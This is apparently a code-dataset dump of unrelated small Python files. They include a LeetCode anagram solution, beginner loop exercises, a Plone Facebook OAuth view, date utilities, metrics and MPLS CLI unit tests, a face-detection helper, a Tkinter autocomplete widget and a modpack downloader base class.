code=start\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n \n # Short and concise\n s_dict, t_dict = {}, {}\n for item in s:\n s_dict[item] = s_dict.get(item, 0)+1\n for item in t:\n t_dict[item] = t_dict.get(item, 0)+1\n\n return s_dict == t_dict\n \n \n #Long answer \n # if len(s) != len(t):\n # return False\n # s_dict = {}\n # t_dict = {}\n # for ch in s:\n # if ch not in s_dict:\n # s_dict[ch] = 1\n # else:\n # s_dict[ch] += 1\n \n # for c in t:\n # if c not in t_dict:\n # t_dict[c] = 1\n # else:\n # t_dict[c] += 1\n \n # return s_dict == t_dict \n \n\n \n# @lc code=end\n\n","sub_path":"242.valid-anagram.py","file_name":"242.valid-anagram.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"122757301","text":"#%% (1) while test\r\n\r\ncnt = 0\r\nwhile cnt != 10:\r\n cnt+=1\r\n print(str(cnt)+\". 한동석\")\r\n\r\n#%% (2) while test2\r\n\r\nqMsg = (\"Q.다음 중 프로그래밍 언어가 아닌 것은?\\n\"\r\n +\"1. JAVA\\n2. 파이썬\\n3. C언어\\n4. 
망둥어\\n\"\r\n )\r\n\r\nwhile True :\r\n \r\n choice = int(input(qMsg))\r\n answer = 4\r\n \r\n if choice == answer :\r\n print(\"정답!\")\r\n break\r\n elif choice >= 1 and choice <=4:\r\n print(\"오답\")\r\n else: \r\n print(\"잘못 입력하셨습니다.\")","sub_path":"Python/day06/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"99246420","text":"# coding: utf-8\n\nimport urllib2\nimport urllib\nimport urlparse\nfrom zope.component import getUtility\nfrom plone.registry.interfaces import IRegistry\nfrom collective.socialpublish.controlpanel.interfaces import ISocialPublishControlPanel\nfrom Products.Five.browser import BrowserView\n#from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.statusmessages.interfaces import IStatusMessage\n\nfrom collective.socialpublish.events import get_page_list\nfrom collective.socialpublish.controlpanel.utils import fb_page_info_list_to_str\n\nENDPOINT = 'graph.facebook.com'\n\ndef get_url(path, args=None):\n args = args or {}\n #if ACCESS_TOKEN:\n # args['access_token'] = ACCESS_TOKEN\n if 'access_token' in args or 'client_secret' in args:\n endpoint = \"https://\" + ENDPOINT\n else:\n endpoint = \"http://\" + ENDPOINT\n return endpoint + path + '?' + urllib.urlencode(args)\n\ndef get_resource(path, args=None):\n return urllib2.urlopen(get_url(path, args=args)).read()\n\n\nclass FacebookAuth(BrowserView):\n \"\"\"\n\n \"\"\"\n #template = ViewPageTemplateFile('')\n\n def __call__(self):\n portal_messages = IStatusMessage(self.request)\n portal_url = getToolByName(self.context, 'portal_url')()\n here_url = portal_url + \"/@@facebook-auth\"\n registry = getUtility(IRegistry)\n settings = registry.forInterface(ISocialPublishControlPanel)\n fb_app_id = settings.fb_app_id\n fb_app_secret = settings.fb_app_secret\n\n code = self.request.form.get('code')\n if code is None:\n portal_messages.add(u\"Illegal access because nothing 'code'\", type=u\"error\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n token_res = get_resource('/oauth/access_token', {'client_id': fb_app_id,\n 'redirect_uri': here_url,\n 'client_secret': fb_app_secret,\n 'code': code})\n fb_access_token = urlparse.parse_qs(token_res).get('access_token')\n try:\n fb_access_token_unicode = unicode(fb_access_token[0], 'utf-8')\n except IndexError:\n portal_messages.add(u\"Couldn't get Facebook token\", type=u\"error\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n settings.fb_access_token = fb_access_token_unicode\n\n page_info_list = get_page_list(fb_access_token_unicode)\n settings.fb_page_info = fb_page_info_list_to_str(page_info_list)\n\n portal_messages.add(u\"Getting Facebook page information\", type=u\"info\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n\n","sub_path":"collective/socialpublish/facebook_auth/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"75872116","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/breno/Envs/djangoplus/lib/python3.7/site-packages/djangoplus/utils/dateutils.py\n# Compiled at: 2019-04-13 18:22:56\n# Size of source mod 2**32: 2346 bytes\nimport 
datetime, calendar\nDAY_NAMES = [calendar.day_name[i].capitalize().split()[0] for i in range(0, 7)]\nDAY_INITIALS = [calendar.day_name[i][0:3].capitalize() for i in range(0, 7)]\nMONTH_NAMES = [calendar.month_name[i].capitalize() for i in range(1, 13)]\nMONTH_INITIALS = [calendar.month_name[i][0:3].capitalize() for i in range(1, 13)]\nDAY_NAMES_CHOICES = [[x, x] for x in DAY_NAMES]\nDAY_INITIALS_CHOICES = [[x, x] for x in DAY_INITIALS]\nMONTH_NAMES_CHOICES = [[x, x] for x in MONTH_NAMES]\nMONTH_INITIALS_CHOICES = [[x, x] for x in MONTH_INITIALS]\n\ndef calculate_age(birthday):\n today = datetime.date.today()\n return today.year - birthday.year - ((today.month, today.day) < (birthday.month, birthday.day))\n\n\ndef numer_of_days(start, end):\n delta = end - start\n return delta.days\n\n\ndef parse_date(date_string):\n if len(date_string) == 10:\n fmt = '%d/%m/%Y'\n else:\n fmt = '%d/%m/%Y %H:%M:%S'\n return datetime.datetime.strptime(date_string, fmt)\n\n\ndef add_months(sourcedate, months):\n month = sourcedate.month - 1 + months\n year = int(sourcedate.year + month / 12)\n month = month % 12 + 1\n day = min(sourcedate.day, calendar.monthrange(year, month)[1])\n return datetime.date(year, month, day)\n\n\ndef add_days(sourcedate, days):\n sourcedate = sourcedate or datetime.date.today()\n return sourcedate + datetime.timedelta(days=days)\n\n\ndef future(days):\n return datetime.date.today() + datetime.timedelta(days=days)\n\n\ndef past(days):\n return datetime.date.today() - datetime.timedelta(days=days)\n\n\ndef pretty_date(d):\n diff = datetime.datetime.now() - d\n s = diff.seconds\n if diff.days > 365 or diff.days < 0:\n return d.strftime('%d %b %y')\n if 60 > diff.days > 30:\n return '1 mês atrás'\n if diff.days > 60:\n return '{} meses atrás'.format(diff.days / 30)\n if diff.days == 1:\n return '1 dia atrás'\n if diff.days > 1:\n return '{} dias atrás'.format(diff.days)\n if s <= 1:\n return 'agora'\n if s < 60:\n return '{} segundos atrás'.format(s)\n if s < 120:\n return '1 minuto atrás'\n if s < 3600:\n return '{} minutos atrás'.format(s / 60)\n if s < 7200:\n return '1 hora atrás'\n return '{} horas atrás'.format(s / 3600)","sub_path":"pycfiles/djangoplus-0.0.98.tar/dateutils.cpython-37.py","file_name":"dateutils.cpython-37.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"19843667","text":"import os\nimport glob\nimport unittest\nimport datetime\n\nfrom haymetric import Metrics, Units, Rotations\n\n\ndef remove_files(files):\n for f in glob.glob(files):\n os.remove(f)\n\n\ndef read_file_to_lines(filename):\n f = open(filename)\n lines = f.readlines()\n f.close()\n return lines\n\n\nclass TestHaymetric(unittest.TestCase):\n def setUp(self):\n self.log_path = \"tst/logs/Test.log\"\n # Wed, 11 May 2016 21:21:00 GMT\n self.sample_timestamp = 1463001660\n self.sample_logfile = self.__get_logfile(self.sample_timestamp)\n\n def tearDown(self):\n remove_files(self.log_path + \"*\")\n os.removedirs(\"tst/logs\")\n\n def test_emit_from_different_metrics(self):\n self.__assert_emit_metrics(\"service=MyTestProgram,market=Hanoi\",\n \"service=MyTestProgram,market=Hanoi\",\n \"method=GetAPI\", \"method=PushAPI\")\n\n def test_emit_metrics_with_dimensions_and_scopes_as_dict(self):\n self.__assert_emit_metrics({\"service\": \"MyTestProgram\", \"market\": \"Hanoi\"},\n {\"service\": \"MyTestProgram\", \"market\": \"Hanoi\"},\n {\"method\": \"GetAPI\"}, {\"method\": \"PushAPI\"})\n\n def 
test_rotation_when_time_changes(self):\n # Wed, 11 May 2016 20:33:01 GMT\n t1 = 1462998781\n # Wed, 11 May 2016 21:33:01 GMT\n t2 = 1463002381\n\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope(\"method=GetAPI\"))\n metrics.flush(t1)\n self.__add_counters(metrics.get_scope(\"method=PushAPI\"))\n metrics.flush(t2)\n metrics.close()\n t1_lines = read_file_to_lines(self.__get_logfile(t1))\n t2_lines = read_file_to_lines(self.__get_logfile(t2))\n self.assertEqual(4, len(t1_lines))\n self.assertEqual(\"Timestamp=1462998781\\n\", t1_lines[0])\n self.assertEqual(\"Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n\", t1_lines[1])\n self.assertEqual(\"Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n\", t1_lines[2])\n self.assertEqual(\"---------\\n\", t1_lines[3])\n self.assertEqual(4, len(t2_lines))\n self.assertEqual(\"Timestamp=1463002381\\n\", t2_lines[0])\n self.assertEqual(\"Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n\", t2_lines[1])\n self.assertEqual(\"Metrics=Failed=2,Pushes=11\\n\", t2_lines[2])\n self.assertEqual(\"---------\\n\", t2_lines[3])\n\n def test_multiple_rotations(self):\n metrics_minutely = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.MINUTELY)\n metrics_minutely.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.MINUTELY)))\n metrics_hourly = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.HOURLY)\n metrics_hourly.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.HOURLY)))\n metrics_daily = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.DAILY)\n metrics_daily.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.DAILY)))\n\n def test_multiple_units(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n scope = metrics.get_scope()\n scope.add_value(\"NanoSecond\", 1, Units.NANOSECOND)\n scope.add_value(\"MicroSecond\", 2, Units.MICROSECOND)\n scope.add_value(\"MilliSecond\", 3, Units.MILLISECOND)\n scope.add_value(\"Second\", 4, Units.SECOND)\n scope.add_value(\"Minute\", 5, Units.MINUTE)\n scope.add_value(\"Hour\", 6, Units.HOUR)\n scope.add_value(\"Byte\", 7, Units.BYTE)\n scope.add_value(\"KiloByte\", 8, Units.KILOBYTE)\n scope.add_value(\"MegaByte\", 9, Units.MEGABYTE)\n scope.add_value(\"GigaByte\", 10, Units.GIGABYTE)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual(\n \"Metrics=MilliSecond=3ms,Hour=6h,KiloByte=8kb,NanoSecond=1ns,GigaByte=10gb,Second=4s,MicroSecond=2us,Byte=7b,MegaByte=9mb,Minute=5m\\n\",\n log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_get_empty_scope(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope())\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', 
log_lines[3])\n\n def test_reset_after_flush(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope(\"method=GetAPI\"))\n metrics.flush(self.sample_timestamp)\n self.__add_counters(metrics.get_scope(\"method=PushAPI\"))\n metrics.flush(self.sample_timestamp)\n metrics.flush(self.sample_timestamp)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(8, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n self.assertEqual('Timestamp=1463001660\\n', log_lines[4])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[5])\n self.assertEqual('Metrics=Failed=2,Pushes=11\\n', log_lines[6])\n self.assertEqual('---------\\n', log_lines[7])\n\n def test_scope_override_and_multiple_updates(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi,method=PushAPI\")\n scope1 = metrics.get_scope(\"method=GetAPI , host = 1.2.3.4\")\n scope1.add_counter(\"CountIt\", 1)\n scope2 = metrics.get_scope(\" host = 1.2.3.4 , methoD=GetAPI\")\n scope2.add_counter(\"CountIt\", 8)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=host=1.2.3.4,market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=CountIt=9\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_scope_override(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi,method=PushAPI\")\n scope = metrics.get_scope(\"method=GetAPI\")\n scope.add_counter(\"MyCounter\", 1)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=MyCounter=1\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_dimension_normalization(self):\n metrics = Metrics(self.log_path, \"maRket=Hanoi , SerViCe=MyTestProgram\")\n scope = metrics.get_scope(\"mEthod=PushAPI\")\n scope.add_counter(\"Success\", 9)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=Success=9\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_counters_and_values(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n scope = metrics.get_scope(\"method=PushAPI\")\n self.__add_counters(scope)\n self.__add_values(scope)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n 
self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=Failed=2,Pushes=11,NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def __get_logfile(self, timestamp=None, rotation=Rotations.HOURLY):\n now = datetime.datetime.now()\n if timestamp:\n now = datetime.datetime.fromtimestamp(timestamp)\n if rotation is Rotations.MINUTELY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d-%H-%M\")\n if rotation is Rotations.HOURLY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d-%H\")\n if rotation is Rotations.DAILY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d\")\n\n def __assert_emit_metrics(self, dimension1, dimension2, scope1, scope2):\n metrics1 = Metrics(self.log_path, dimension1)\n self.__add_values(metrics1.get_scope(scope1))\n metrics1.flush(self.sample_timestamp)\n metrics1.close()\n metrics2 = Metrics(self.log_path, dimension2)\n self.__add_counters(metrics2.get_scope(scope2))\n metrics2.flush(self.sample_timestamp)\n metrics2.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(8, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n self.assertEqual('Timestamp=1463001660\\n', log_lines[4])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[5])\n self.assertEqual('Metrics=Failed=2,Pushes=11\\n', log_lines[6])\n self.assertEqual('---------\\n', log_lines[7])\n\n @staticmethod\n def __add_counters(scope):\n scope.add_counter(\"Pushes\", 10)\n scope.add_counter(\"Pushes\", 1)\n scope.add_counter(\"Failed\", 1)\n scope.add_counter(\"Failed\", 1)\n\n @staticmethod\n def __add_values(scope):\n scope.add_value(\"Time\", 1200, Units.MILLISECOND)\n scope.add_value(\"Time\", 800, Units.MILLISECOND)\n scope.add_value(\"DBTime\", 10, Units.MILLISECOND)\n scope.add_value(\"NoUnit\", 999)\n scope.add_value(\"NoUnit\", 1)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_haymetric.py","file_name":"test_haymetric.py","file_ext":"py","file_size_in_byte":11490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"140256192","text":"from mtcnn.mtcnn import MTCNN\n\nclass mtcnn_to_face_alignment:\n def __init__(self):\n self.detector = MTCNN()\n\n def find_bboxes(self, input_img):\n \"\"\"\n Recieve: an image\n\n Return: list of bbox format (x1, y1, x2, y2)\n \"\"\"\n faces_positions = self.detector.detect_faces(input_img)\n #format: (x1, y1, w, h) y probabilidad pero no interesa\n bbox_list = []\n if (len(faces_positions)!=0):\n for face in faces_positions:\n bbox = face['box']\n bbox_formated = [[bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]]\n bbox_list.append(bbox_formated)\n return bbox_list\n\n def size_of_bbox(self, bbox):\n \"\"\"\n return:\n multiplication of width x height\n \"\"\"\n return bbox[2]*bbox[3]\n #terminar\n def mtcnn_bbox_face_alignment_format_a(self, input_img):\n \"\"\"\n Recieve: an image\n\n Return: the biggest bbox format (x1, y1, x2, y2)\n \"\"\"\n max_size_box = 0\n size_box = 0\n bbox_to_return = None\n faces_positions = self.detector.detect_faces(input_img)\n #format: (x1, y1, w, h) y probabilidad pero no 
interesa\n bbox_list = []\n if (len(faces_positions)!=0):\n for face in faces_positions:\n bbox = face['box']\n size_box = size_of_bbox(bbox)\n if (size_box > max_size_box):\n bbox_to_return = bbox\n ###terminar para bbox return en nuevo formato\n bbox = bbox_to_return\n bbox_formated = [[bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]]\n bbox_list.append(bbox_formated)\n return bbox_list\n","sub_path":"mtcnn_to_face_alignment.py","file_name":"mtcnn_to_face_alignment.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"184714663","text":"from sys import argv\nfrom os.path import exists\n\nscript, from_file, to_file = argv \n\nprint(\"Coping from {} to {}.\".format(from_file,to_file))\n\n#we could do these two on one line too, how?\n#in_file = open(from_file)\n#indata = in_file.read()\n\nindata = open(from_file).read()\n\nprint(\"The input file is {} bytes long.\".format(len(indata)))\n\nprint(\"Does the output file exists? {}\".format(exists(to_file)))\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\ninput()\n\nout_file = open(to_file,'w')\nout_file.write(indata)\n\nprint(\"All right, all done.\")\n\nout_file.close()\n","sub_path":"ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"244321045","text":"from django.conf.urls import patterns, include, url\nfrom settings import APP_ROOT\n\nurlpatterns = patterns('',\n url(r'^$', 'register_users.views.home', name='home'),\n\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'static/'}),\n\n url(r'^uploads/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'uploads/'}),\n\n url(r'^media/img/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'uploads/photos/'}, name='images_link'),\n\n url(r'^accounts/', include('register_users.urls')),\n\n url(r'^msg/', include('private_message.urls')),\n\n url(r'^friend/', include('friends_app.urls')),\n\n url(r'^media/', include('media_app.urls')),\n\n url(r'^music/', include('music_app.urls')),\n\n url(r'^settings/', include('settings_app.urls')),\n\n url(r'^find/', include('find_app.urls'))\n)\n","sub_path":"djangoproj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"461565645","text":"import os\nimport sys\nimport traceback\nfrom unittest import mock\n\nfrom click.testing import CliRunner\n\nfrom .mock_tables import dbconnector\n\nimport config.main as config\nimport show.main as show\nfrom utilities_common.db import Db\n\nshow_interfaces_mpls_output=\"\"\"\\\nInterface MPLS State\n------------ ------------\nEthernet2 enable\nEthernet4 disable\nEthernet8 disable\nEthernet16 disable\nLoopback0 disable\nPortChannel2 disable\nVlan2 enable\n\"\"\"\n\nshow_interfaces_mpls_specific_output=\"\"\"\\\nInterface MPLS State\n----------- ------------\nEthernet2 enable\n\"\"\"\n\nmodules_path = os.path.join(os.path.dirname(__file__), \"..\")\ntest_path = os.path.join(modules_path, \"tests\")\nsys.path.insert(0, modules_path)\nsys.path.insert(0, test_path)\nmock_db_path = os.path.join(test_path, \"mpls_input\")\n\n\nclass TestMpls(object):\n @classmethod\n def setup_class(cls):\n print(\"SETUP\")\n os.environ['UTILITIES_UNIT_TESTING'] = \"1\"\n\n def test_config_mpls_add(self):\n runner = CliRunner()\n 
db = Db()\n obj = {'config_db':db.cfgdb}\n\n result = runner.invoke(config.config.commands[\"interface\"].commands[\"mpls\"].commands[\"add\"], [\"Ethernet4\"], obj=obj)\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert db.cfgdb.get_entry(\"INTERFACE\", \"Ethernet4\") == {\"mpls\": \"enable\"}\n\n def test_config_mpls_remove(self):\n runner = CliRunner()\n db = Db()\n obj = {'config_db':db.cfgdb}\n\n result = runner.invoke(config.config.commands[\"interface\"].commands[\"mpls\"].commands[\"remove\"], [\"Ethernet4\"], obj=obj)\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert db.cfgdb.get_entry(\"INTERFACE\", \"Ethernet4\") == {\"mpls\": \"disable\"}\n\n def test_show_interfaces_mpls(self):\n jsonfile = os.path.join(mock_db_path, 'appl_db')\n dbconnector.dedicated_dbs['APPL_DB'] = jsonfile\n\n runner = CliRunner()\n result = runner.invoke(show.cli.commands[\"interfaces\"].commands[\"mpls\"], [])\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert result.output == show_interfaces_mpls_output\n\n def test_show_interfaces_mpls_specific(self):\n jsonfile = os.path.join(mock_db_path, 'appl_db')\n dbconnector.dedicated_dbs['APPL_DB'] = jsonfile\n\n runner = CliRunner()\n result = runner.invoke(show.cli.commands[\"interfaces\"].commands[\"mpls\"], [\"Ethernet2\"])\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert result.output == show_interfaces_mpls_specific_output\n\n @classmethod\n def teardown_class(cls):\n print(\"TEARDOWN\")\n os.environ['UTILITIES_UNIT_TESTING'] = \"0\"\n dbconnector.dedicated_dbs['APPL_DB'] = None\n","sub_path":"tests/mpls_test.py","file_name":"mpls_test.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"108273441","text":"'''\nCreated on Nov 30, 2018\n\n@author: vahidrogo\n'''\n\nfrom tkinter import ttk\n\n\nclass ComboboxAutoComplete(ttk.Combobox):\n '''\n Adds typing autocomplete functionality to the Combobox widget\n from the ttk module.\n \n %d = Type of action (1=insert, 0=delete, -1 for others)\n %i = index of char string to be inserted/deleted, or -1\n %P = value of the entry if the edit is allowed\n %s = value of entry prior to editing\n %S = the text string being inserted or deleted, if any\n %v = the type of validation that is currently set\n %V = the type of validation that triggered the callback\n (key, focusin, focusout, forced)\n %W = the tk name of the widget\n '''\n \n \n def __init__(self, parent, selected_function=None, value_list=[], **kwargs):\n super().__init__(parent, **kwargs)\n \n self.selected_function = selected_function\n self.value_list = []\n \n if value_list:\n self.set_value_list(value_list)\n \n self.cursor_position = 0\n \n vcmd = (self.register(self._on_validate), '%d', '%i', '%P')\n \n self.config(validate='key', validatecommand=vcmd)\n \n self.bind('<>', self._selected)\n self.bind('', self._selected)\n self.bind('', self._key_handler)\n \n \n def _selected(self, event=None):\n value = self.get()\n \n if value and value in self.value_list:\n if self.selected_function:\n self.icursor('end')\n self.select_range(0, 'end')\n \n self.selected_function()\n \n \n def _key_handler(self, event):\n keysm = event.keysym\n \n if keysm in ['Return', 'Right']:\n self._selected()\n \n elif keysm in ['BackSpace', 'Left']:\n self.delete(self.cursor_position, 'end')\n \n self.cursor_position += 1\n 
self.icursor(self.cursor_position)\n \n \n def _on_validate(self, d, i, P):\n '''\n Args:\n d: type of action \"1\" = insert, \"0\" = delete, \"-1\" = others \n i: index of char string to be inserted\n P: value of entry if the edit is allowed\n '''\n # if a character is being inserted\n if d == '1':\n self.cursor_position = int(i) + 1\n \n if P:\n match_value = ''\n \n for value in self.value_list:\n if value.lower().startswith(P.lower()):\n match_value = value \n \n break\n \n if match_value:\n self.set(match_value)\n \n # places the cursor after the character that was just inserted\n self.icursor(self.cursor_position)\n \n # highlights all the characters to the right of the one inserted\n self.select_range(self.cursor_position, 'end')\n \n return True\n \n \n def set_value_list(self, value_list):\n self.config(values=value_list)\n \n self.value_list = value_list\n \n","sub_path":"comboboxautocomplete.py","file_name":"comboboxautocomplete.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"244304794","text":"from abc import ABC, abstractmethod\nimport os\nimport urllib.request\nimport io\nimport os\n\nclass AbstractModpack(ABC):\n __slots__=('title','description')\n @abstractmethod\n def __init__(self, slug, title, summary, description):\n self.slug = slug\n self.title = title\n self.summary = summary\n self.description = description\n self._on_disk_path = os.path.expanduser('~/.local/share/minefish/'+slug)\n os.makedirs(self._on_disk_path, exist_ok=True)\n\n def _getimage(self, imagetype):\n \"\"\"\n Read from disk and return an image.\n :param imagetype: should be one of either 'icon' or 'background', but may be any legal filename\n :return: a PIL.Image, if we are able, or None if we are not\n \"\"\"\n try:\n from PIL import Image\n except ImportError:\n return None\n candidates = [x for x in os.listdir(self._on_disk_path) if x.startswith(imagetype+os.path.extsep)]\n if candidates:\n return Image.open(os.path.join(self._on_disk_path, candidates[0]))\n else:\n image_bytes, image_extension = self._get_image_bytes(imagetype)\n if not image_bytes:\n return None\n image = Image.open(io.BytesIO(image_bytes)) # if this fails we shouldn't be saving it to disk anyway.\n if image_extension:\n with open(os.path.join(self._on_disk_path, imagetype+os.path.extsep+image_extension), 'wb') as f:\n f.write(image_bytes)\n return image\n\n @abstractmethod\n def _get_image_bytes(self, image_type):\n \"\"\"Return a 2-tuple of a bytes object containing the contents of an image file, which will be written to disk\n by the caller, and a file extension without the leading dot. image_type will be one of either \"icon\",\n in which case you should return a small image suitable for displaying next to the modpack name and details in\n the pack list, or \"background\", in which case return a larger image suitable for displaying behind the\n modpack's detailedinfo. In case you cannot return an image, return a 2-tuple (None, None).\n If you do not want the file to be cached to disk (for example, because it was sourced from the executable),\n return a bytes object and None as the extension.\n\n It is up to the implementation to make sense (or not) of alternate values for image_type; the stock UI will\n never call get_image() with anything other than those two values, although third party code may. 
If you don't\n know what to do, return (None,None).\n \"\"\"\n return (None, None)\n\n\n def download(self, version:str=None):\n \"\"\"\n Download the modpack from whatever server using whatever means you find most suitable.\n :param version: Optional parameter specifying one element from the list returned by getVersionList(),\n or None (or omitted) for the latest version.\n :return: None\n \"\"\"\n pass\n\n @abstractmethod\n def _download(self, version:str=None):\n \"\"\"\n Take a version string and return an iterator in Swordfish CSV format specifying to the downloader what to do.\n The Swordfish CSV format is highly flexible but in case it is insufficient this method may have side effects.\n\n :param version:\n :return: An iterator following the sfpds CSV format.\n \"\"\"\n\n @abstractmethod\n def getVersions(self):\n return []\n\n\n","sub_path":"swordfish_launcher/downloader/modpack.py","file_name":"modpack.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"504670000","text":"# ARID3A.train.labels.tsv\nimport os\n\n\ndef parse_binding_site(tsv_path, dir_path, out_path):\n openi = open(dir_path + tsv_path)\n b_file = open(out_path + \"bind.\" + 